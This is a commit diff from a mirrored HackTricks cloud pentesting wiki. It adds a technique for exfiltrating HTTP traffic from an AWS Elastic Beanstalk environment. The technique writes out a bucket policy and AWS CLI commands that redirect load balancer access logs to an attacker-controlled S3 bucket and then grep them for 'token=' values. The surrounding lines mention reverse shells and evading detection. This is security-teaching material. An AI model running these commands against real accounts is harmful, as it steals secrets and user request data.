gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-06-12 19:11:44 -07:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #287 from JaimePolop/master

Browse Source 
a
This commit is contained in:
SirBroccoli
2026-05-18 17:32:37 +02:00
committed by GitHub
parent e839fdd130 51f602b871
commit 72f0f71ef5
1 changed files with 93 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md
+93 -3
View File
@@ -182,7 +182,97 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
``` ```
### `elasticbeanstalk:DescribeEnvironmentResources`, `elasticloadbalancing:ModifyLoadBalancerAttributes`, `s3:PutBucketPolicy`, `s3:ListBucket`, `s3:GetObject` to enable ALB access logs exfiltration
If an attacker can **enumerate** an Elastic Beanstalk **web** environment, **update** it, and also **control the policy of an S3 bucket** they own, they may be able to **exfiltrate HTTP traffic** by enabling **ALB access logs** and redirecting them to that bucket.
> [!NOTE]
> This technique also needs the ability to **modify the destination bucket policy** so the ALB log delivery service can write the logs there.
Prepare an **attacker-controlled bucket** so the ALB log delivery service can write there:
```bash
ENV_NAME=<environment-name>
LOG_BUCKET=<attacker-bucket>
LOG_PREFIX=<prefix>
cat > /tmp/alb-log-policy.json <<EOF
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowALBLogDeliveryPut",
"Effect": "Allow",
"Principal": {
"Service": [
"logdelivery.elasticloadbalancing.amazonaws.com",
"delivery.logs.amazonaws.com"
]
},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/*"
},
{
"Sid": "AllowALBLogDeliveryAclCheck",
"Effect": "Allow",
"Principal": {
"Service": [
"logdelivery.elasticloadbalancing.amazonaws.com",
"delivery.logs.amazonaws.com"
]
},
"Action": [
"s3:GetBucketAcl",
"s3:ListBucket"
],
"Resource": "arn:aws:s3:::$LOG_BUCKET"
}
]
}
EOF
aws s3api put-bucket-policy \
--bucket "$LOG_BUCKET" \
--policy file:///tmp/alb-log-policy.json \
--profile "$PROFILE"
```
Then enable the ALB access logs:
```bash
aws elbv2 modify-load-balancer-attributes \
--load-balancer-arn "$LB_ARN" \
--attributes \
Key=access_logs.s3.enabled,Value=true \
Key=access_logs.s3.bucket,Value=$LOG_BUCKET \
Key=access_logs.s3.prefix,Value=$LOG_PREFIX \
--region us-east-1 \
--profile "$PROFILE"
```
After that, wait for the ALB to batch and deliver the logs:
```bash
aws s3 ls "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" --recursive --profile "$PROFILE"
```
Finally, download the logs and grep for interesting query strings:
```bash
mkdir -p /tmp/lab2-logs
aws s3 cp "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" \
/tmp/lab2-logs \
--recursive \
--profile "$PROFILE"
find /tmp/lab2-logs -name '*.gz' -print0 | xargs -0 zgrep -n 'token='
```
The **request line** inside the ALB logs may contain values such as **`?token=<FLAG>`** if sensitive data is being sent in the URL.
**Impact**:
- Continuous exfiltration of HTTP request metadata through a logging plane controlled by the attacker
- Exposure of secrets present in the URL query string
- A stealthier exfiltration path because the traffic is produced by legitimate application components and exported by AWS-managed logging
{{#include ../../../../banners/hacktricks-training.md}} {{#include ../../../../banners/hacktricks-training.md}}